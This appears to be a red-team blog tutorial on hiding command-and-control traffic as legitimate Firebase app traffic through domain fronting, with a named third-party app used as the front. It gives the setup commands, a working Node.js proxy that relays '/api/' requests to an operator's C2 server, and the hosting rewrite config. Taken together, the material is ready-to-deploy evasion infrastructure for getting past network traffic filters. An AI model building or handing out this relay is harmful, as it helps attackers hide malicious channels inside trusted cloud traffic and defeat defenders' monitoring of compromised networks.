Firebase Domain Front - Hiding C2 as App traffic

We often see that large organization use firebase for hosting their applications and database. Firebase has a lot of features such as real-time database, hosting, cloud functions, hosting etc. Today we are going to talk about firebase hosting and cloud functions which are used by a lot of mobile applications these days. In our recent project, we were able to hide ourselves as a legit mobile traffic and bypass a lot of traffic filters

Firebase Cloud Functions

Firebase allows an operator to write an applications in Node JS and deploy it using its hosting feature.

Setting up Firebase Domain Front

So lets start by selecting a app hosted using firebase. In the following case we'll take https://go.auk.eco/ as our selected app.

Step 1: Create an account on https://firebase.google.com

Step 2: Go to Console

Step 3: Create a project and give it a name

Step 4: Open your command prompt and install firebase cli.

npm install -g firebase-tools

mkdir awesomedomainfront
cd awesomedomainfront
firebase login

Step 6: Initiate Hosting

firebase init hosting

Once you hit the above command you'll be presented with many options. See the following screenshot for responses to the options

Step 7: Initiate Cloud functions

firebase init functions

Again you'll be presented with many options. See the following screenshot for the response to the options

Step 8: Install Express and http-proxy

cd functions
npm i express --save
npm i http-proxy --save

Step 9: Edit the index.js

Since you are already in the functions folder after saving the npm packages. Lets edit the index.js file in this folder.

index.js

const functions = require('firebase-functions');
const express = require('express');

const app = express();

var http = require('http'), httpProxy = require('http-proxy');


var proxy = httpProxy.createProxyServer({secure:false,xfwd:true}); //Setting up X-forwarded for header 

// your C2 must have a URI . In this case I am using /api/" 
app.all('/api/*', function(req, res, next){
    console.log(req.url);
    req.url = "/api/" + req.url.slice(5);
	console.log("Req URL:"+req.url);
    proxy.web(req, res, {
        target: 'https://firebase.redteam.cafe:443/' /* Change it to your domain */
    }, function(e) {
        console.log(e);
    }); 
	res.set('Cache-Control', 'no-cache, no-store');
});


exports.app = functions.https.onRequest(app);

// // Create and Deploy Your First Cloud Functions
// // https://firebase.google.com/docs/functions/write-firebase-functions
//
// exports.helloWorld = functions.https.onRequest((request, response) => {
//   functions.logger.info("Hello logs!", {structuredData: true});
//   response.send("Hello from Firebase!");
// });

Step 10: Edit the firebase.json file

Go to the parent folder and edit firebase.json

cd ../

firebase.json

{
  "hosting": {
	"headers" : [{
		"source" : "**/*.@(js)",
		"headers": [{
			"key" : "Cache-Control",
			"value" : "no-cache, no-store"
			}]
		}],
    "public": "public",
	"rewrites": [{
	/* your C2 must have a URI . In this case I am using /api/" */
		"source": "/api/**",
		"function": "app",
		"run":{
			"region" : "asia-east2"
			}
		}],
    "ignore": [
      "firebase.json",
      "**/.*",
      "**/node_modules/**"
    ]
  },
  "functions": {
  }
}